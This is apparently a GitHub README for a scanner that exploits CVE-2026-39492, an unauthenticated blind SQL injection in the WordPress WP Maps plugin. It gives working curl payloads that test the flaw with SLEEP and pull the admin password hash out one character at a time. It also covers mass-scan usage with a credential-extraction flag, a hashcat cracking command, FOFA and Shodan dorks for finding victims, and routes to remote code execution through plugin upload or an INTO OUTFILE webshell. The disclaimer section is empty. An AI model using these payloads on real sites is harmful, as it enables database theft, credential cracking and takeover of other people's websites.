shinthink/CVE-2026-39492
GitHub: shinthink/CVE-2026-39492
针对 WordPress WP Maps 插件未授权盲注 SQL 注入漏洞(CVE-2026-39492)的批量检测与凭据提取工具。
Stars: 1 | Forks: 0
CVE-2026-39492 — WP Maps 盲注 SQLi 扫描器
通过反引号绕过实现未授权时间盲注 SQLi → 数据库提取
## 概述 **CVE-2026-39492** 是 **WP Maps** 插件 (wp-google-map-plugin) **≤ 4.9.1** 版本中一个严重级别 (CVSS 9.3) 的未授权盲注 SQL injection 漏洞。 `wpgmp_ajax_call` AJAX handler 通过 `wp_ajax_nopriv_` 注册以供未授权访问。`location_id` 参数会传递给 `FlipperCode_Model_Base::is_column()` —— 该函数错误地将**被反引号包裹的输入**视为受信任的 SQL 列标识符,从而完全绕过了 WordPress 的 `esc_sql()` 清理。 ### 受影响版本 | WP Maps 版本 | 状态 | |---|---| | ≤ 4.9.1 | 存在漏洞 | | ≥ 4.9.2 | 已修复 | ## 漏洞机制 ### 根本原因 在插件的数据库抽象层中,`is_column()` 会检查用户输入是否被反引号包裹: ``` // Vulnerable: backtick-wrapped input treated as trusted column identifier function is_column($value) { if (preg_match('/^`.*`$/', $value)) { return true; // bypasses esc_sql() entirely! } return false; } ``` 当 `is_column()` 返回 `true` 时,该输入将直接传递给 SQL 查询,而不经过 `esc_sql()` 转义。这使得以下操作成为可能: ``` location_id=`1` AND SLEEP(5) AND `1`=`1 ``` ### 攻击流程 ``` 1. Detect WP Maps via readme.txt → extract version 2. POST to /wp-admin/admin-ajax.php?action=wpgmp_ajax_call 3. Inject backtick-wrapped payload in location_id parameter 4. Measure response time — SLEEP(N) confirms SQL injection 5. Extract data via boolean/time-based blind technique ``` ### 为什么是 CVSS 9.3 | 评估指标 | 值 | |---|---| | Attack Vector | Network | | Attack Complexity | Low | | Privileges Required | None | | User Interaction | None | | Scope | Changed (impacts entire DB) | | Confidentiality | High | | Integrity | None | | Availability | Low | ## 安装 ``` git clone https://github.com/shinthink/CVE-2026-39492.git cd CVE-2026-39492 pip install -r requirements.txt ``` ## 使用方法 ``` # 单个目标检测 python cve_2026_39492.py -t target.com # Mass scan python cve_2026_39492.py -f targets.txt # Mass scan + 保存结果 python cve_2026_39492.py -f targets.txt -o sqli.txt # 单个目标与 credential extraction python cve_2026_39492.py -t target.com --extract -v # Verbose output python cve_2026_39492.py -t target.com -v ``` ### 参数 ``` -t, --target Single target (domain or IP) -f, --file Target list, one per line -o, --output Save vulnerable targets to file --threads Concurrent workers (default: 20) --extract Extract admin credentials from confirmed targets -v, --verbose Show detailed output ``` ## 概念验证 ### 单一目标 ``` $ python cve_2026_39492.py -t target.com -v ``` ``` CVE-2026-39492 — WP Maps Blind SQL Injection Scanner CVSS 9.3 | Pre-Auth | wpgmp_ajax_call → Backtick Bypass Target: WP Maps (wp-google-map-plugin) <= 4.9.1 Vector: admin-ajax.php?action=wpgmp_ajax_call → location_id Bypass: backtick-wrapped input bypasses esc_sql() [+] WP Maps detected: v4.9.0 [*] SQLi test: 6.2s (threshold: 5s) [+] Blind SQLi CONFIRMED (response: 6.2s) Host : target.com WP Maps : YES v4.9.0 SQLi : YES Resp time : 6.2s Time : 7.1s ``` ### 提取凭据 ``` $ python cve_2026_39492.py -t target.com --extract -v ``` ``` [+] Blind SQLi CONFIRMED (response: 5.8s) [*] Extracting admin credentials via blind SQLi... [*] Extracting: admin_user [*] Extracting: $P$BqVg... Admin User : admin_user Admin Hash : $P$BqVg7xX... ``` ### 批量扫描 ``` CVE-2026-39492 WP Maps Blind SQLi Scanner Targets: 2500 | Threads: 20 Vector: wpgmp_ajax_call → location_id backtick bypass ─────────────────────────────────────────────────────── [SQLi] target-vuln.com 6.2s v4.9.0 resp:6.2s [SQLi] wp-maps-site.com 5.8s v4.8.5 resp:5.8s [500/2500] 20% | WP Maps:47 SQLi:12 | current-target.com ─────────────────────────────────────────────────────── Scan complete | Time: 320s ─────────────────────────────────────────────────────── Targets : 2500 WP Maps found : 47 SQLi confirmed : 12 ``` ### 手动利用 **第 1 步 — 检测插件** ``` curl -sk 'https://target.com/wp-content/plugins/wp-google-map-plugin/readme.txt' | head -5 ``` **第 2 步 — 使用 SLEEP 测试 SQLi** ``` time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \ -d 'action=wpgmp_ajax_call' \ -d 'location_id=`1` AND SLEEP(5) AND `1`=`1' # Response > 5 seconds → VULNERABLE ``` **第 3 步 — 通过盲注提取 admin hash** ``` # 检查 admin hash 的第一个字符 time curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \ -d 'action=wpgmp_ajax_call' \ -d 'location_id=`1` AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(3),0) AND `1`=`1' # Response > 3 seconds → 第一个字符为 ASCII 36 = '$' ``` **第 4 步 — 破解 hash 并登录 → 完全 RCE** ``` hashcat -m 400 -a 0 admin_hash.txt /usr/share/wordlists/rockyou.txt ``` ## FOFA Dork ``` body="wp-google-map-plugin" ``` ## Shodan ``` http.html:"wp-google-map-plugin" ``` ## 影响 成功利用此漏洞可以提取**整个 WordPress 数据库**: - Admin 密码 hash → 破解 → 登录 admin → 上传插件 → RCE - 用户 PII、电子邮件、session token - 存储在 wp_options 中的 API key - 如果存在 MySQL FILE 权限:`SELECT ... INTO OUTFILE` → webshell → 直接 RCE ## 免责声明 ## 参考资源 | 资源 | 链接 | |---|---| | IONIX Advisory | [ionix.io/threat-center/cve-2026-39492](https://www.ionix.io/threat-center/cve-2026-39492/) | | WPScan Advisory | [wpscan.com/vulnerability/c1f19d2e](https://wpscan.com/vulnerability/c1f19d2e-b28e-4962-951d-946b311fcd0b/) | | Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin/wp-maps-store-locatorgoogle-mapsopenstreetmapmapboxlistingdirectory-filters-491-unauthenticated-sql-injection) | | NVD Entry | [CVE-2026-39492](https://nvd.nist.gov/vuln/detail/CVE-2026-39492) | | Plugin Trac | [wp-google-map-plugin](https://plugins.trac.wordpress.org/browser/wp-google-map-plugin/) |本项目与 Flipper Code 或 WP Maps 无关。
标签:CISA项目, Python, WordPress, 加密, 无后门, 漏洞扫描器, 逆向工具